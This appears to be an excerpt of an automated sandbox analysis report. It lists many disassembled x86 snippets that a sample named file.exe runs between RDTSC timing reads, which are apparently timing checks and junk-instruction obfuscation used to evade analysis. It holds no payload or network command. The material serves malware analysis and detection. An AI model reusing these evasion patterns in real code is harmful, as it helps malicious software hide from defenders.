                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EB45 second address: D2EC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jnp 00007FD2D0B60AEEh 0x0000000d jg 00007FD2D0B60AE8h 0x00000013 pushad 0x00000014 popad 0x00000015 nop 0x00000016 mov di, 226Eh 0x0000001a push 00000000h 0x0000001c add dword ptr [ebp+122D2198h], esi 0x00000022 push B6F8BDBDh 0x00000027 jmp 00007FD2D0B60AEDh 0x0000002c add dword ptr [esp], 490742C3h 0x00000033 mov edi, dword ptr [ebp+122D1996h] 0x00000039 push 00000003h 0x0000003b push ecx 0x0000003c mov dword ptr [ebp+122D2D6Dh], eax 0x00000042 pop edx 0x00000043 push 00000000h 0x00000045 and di, 6AC9h 0x0000004a push 00000003h 0x0000004c jmp 00007FD2D0B60AF3h 0x00000051 call 00007FD2D0B60AE9h 0x00000056 push eax 0x00000057 jmp 00007FD2D0B60AF9h 0x0000005c pop eax 0x0000005d push eax 0x0000005e jmp 00007FD2D0B60AF0h 0x00000063 mov eax, dword ptr [esp+04h] 0x00000067 push edi 0x00000068 jng 00007FD2D0B60AECh 0x0000006e pop edi 0x0000006f mov eax, dword ptr [eax] 0x00000071 push esi 0x00000072 jmp 00007FD2D0B60AF3h 0x00000077 pop esi 0x00000078 mov dword ptr [esp+04h], eax 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f push edi 0x00000080 pop edi 0x00000081 jg 00007FD2D0B60AE6h 0x00000087 popad 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EC1A second address: D2EC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0DFA0D3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2ECC3 second address: D2ED3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FD2D0B60AE8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 sub ecx, dword ptr [ebp+122D2E2Eh] 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FD2D0B60AE8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 push ecx 0x00000046 mov dword ptr [ebp+122D2B35h], ebx 0x0000004c pop edx 0x0000004d js 00007FD2D0B60AF1h 0x00000053 jmp 00007FD2D0B60AEBh 0x00000058 sub esi, 7CE8B8C5h 0x0000005e push 2FAB2272h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 pop eax 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2ED3C second address: D2ED53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2ED53 second address: D2ED5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD2D0B60AE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2ED5D second address: D2EDE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 2FAB22F2h 0x0000000f cld 0x00000010 push 00000003h 0x00000012 js 00007FD2D0DFA0C7h 0x00000018 stc 0x00000019 xor dword ptr [ebp+122D33CDh], ebx 0x0000001f push 00000000h 0x00000021 jmp 00007FD2D0DFA0D0h 0x00000026 push 00000003h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007FD2D0DFA0C8h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 jmp 00007FD2D0DFA0D5h 0x00000047 and cl, FFFFFF92h 0x0000004a push 896B4379h 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FD2D0DFA0D0h 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EEEF second address: D2EEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EEF5 second address: D2EEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EEF9 second address: D2EF99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D34CFh] 0x00000012 push 00000000h 0x00000014 mov dx, cx 0x00000017 push A9C2359Bh 0x0000001c push edx 0x0000001d push esi 0x0000001e jnp 00007FD2D0B60AE6h 0x00000024 pop esi 0x00000025 pop edx 0x00000026 add dword ptr [esp], 563DCAE5h 0x0000002d mov edx, dword ptr [ebp+122D3483h] 0x00000033 push 00000003h 0x00000035 jg 00007FD2D0B60AECh 0x0000003b push 00000000h 0x0000003d jng 00007FD2D0B60AE9h 0x00000043 movsx edx, cx 0x00000046 push 00000003h 0x00000048 mov edi, edx 0x0000004a call 00007FD2D0B60AE9h 0x0000004f jnp 00007FD2D0B60AFEh 0x00000055 push eax 0x00000056 jc 00007FD2D0B60AEAh 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 pushad 0x00000061 jmp 00007FD2D0B60AEAh 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EF99 second address: D2EF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EF9D second address: D2EFCD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FD2D0B60AF4h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jmp 00007FD2D0B60AEBh 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EFCD second address: D2EFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pop eax 0x00000007 sub dword ptr [ebp+122D2CC4h], ecx 0x0000000d lea ebx, dword ptr [ebp+12450A90h] 0x00000013 mov dword ptr [ebp+122D2E0Eh], eax 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FD2D0DFA0C8h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FFDB second address: D4FFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FD2D0B60AECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FFE8 second address: D4FFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E1C0 second address: D4E1CA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2D0B60AE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E1CA second address: D4E1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD2D0DFA0C8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E490 second address: D4E4A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD2D0B60AF2h 0x0000000c jns 00007FD2D0B60AE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EB07 second address: D4EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD2D0DFA0CFh 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC59 second address: D4EC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0B60AF8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC75 second address: D4EC7F instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0DFA0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EDB1 second address: D4EDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EDB5 second address: D4EDB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EDB9 second address: D4EDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EEF6 second address: D4EF28 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD2D0DFA0C6h 0x00000008 jmp 00007FD2D0DFA0D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FD2D0DFA0D2h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F846 second address: D4F84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F84A second address: D4F850 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D514BE second address: D514DD instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD2D0B60AF2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D514DD second address: D514F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD2D0DFA0C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2D0DFA0CDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5532F second address: D55333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55333 second address: D55340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55340 second address: D55345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5549F second address: D554F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2D0DFA0D0h 0x00000008 jnl 00007FD2D0DFA0C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FD2D0DFA0D4h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push edx 0x0000001d jmp 00007FD2D0DFA0CEh 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jno 00007FD2D0DFA0C6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D554F3 second address: D554F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D554F9 second address: D55510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0DFA0D3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D544BA second address: D544BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B13C second address: D5B170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FD2D0DFA0D4h 0x0000000e pop edi 0x0000000f jmp 00007FD2D0DFA0D0h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AA0E second address: D5AA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AD55 second address: D5AD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AEA6 second address: D5AEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AEAA second address: D5AEB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AEB0 second address: D5AEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD2D0B60AEEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E744 second address: D5E778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D3h 0x00000007 jng 00007FD2D0DFA0C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007FD2D0DFA0D7h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B6A second address: D19B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B6E second address: D19B7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FD2D0DFA0C8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B7C second address: D19B85 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B85 second address: D19BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD2D0DFA0C6h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edi 0x00000013 jmp 00007FD2D0DFA0CAh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19BA2 second address: D19BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE0B second address: D5EE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE0F second address: D5EE26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FD2D0B60AE6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE7C second address: D5EE82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE82 second address: D5EE88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE88 second address: D5EEC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FD2D0DFA0D8h 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b pushad 0x0000001c jne 00007FD2D0DFA0C6h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EEC3 second address: D5EEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edx 0x00000009 jnp 00007FD2D0B60AF7h 0x0000000f jmp 00007FD2D0B60AF1h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007FD2D0B60AE6h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EEF1 second address: D5EEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EEF5 second address: D5EF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FD2D0B60AE6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F4CC second address: D5F4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F4D2 second address: D5F4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FBBB second address: D5FBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0CCh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FBCC second address: D5FBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0B60AF9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FC92 second address: D5FCF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FD2D0DFA0C8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov esi, 3EEE763Eh 0x00000027 nop 0x00000028 push ebx 0x00000029 jmp 00007FD2D0DFA0D2h 0x0000002e pop ebx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jno 00007FD2D0DFA0DFh 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FDBE second address: D5FDC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6074C second address: D6076C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD2D0DFA0D2h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60F83 second address: D60F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60F87 second address: D60F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D621EA second address: D621F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60F8D second address: D60F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D621F7 second address: D621FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60F93 second address: D60F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D635DA second address: D63672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0B60AF4h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007FD2D0B60AEAh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FD2D0B60AE8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c cmc 0x0000002d mov edi, 14EE3DB3h 0x00000032 push 00000000h 0x00000034 add edi, 5E165371h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FD2D0B60AE8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 jnp 00007FD2D0B60AECh 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FD2D0B60AF5h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63F81 second address: D63FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FD2D0DFA0C6h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FD2D0DFA0C8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FD2D0DFA0C8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push 00000000h 0x00000049 jmp 00007FD2D0DFA0D2h 0x0000004e xchg eax, ebx 0x0000004f push ebx 0x00000050 pushad 0x00000051 push edx 0x00000052 pop edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63D3E second address: D63D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63FF0 second address: D63FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63D44 second address: D63D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FD2D0B60AE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64890 second address: D64894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64894 second address: D6489A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6534C second address: D65364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
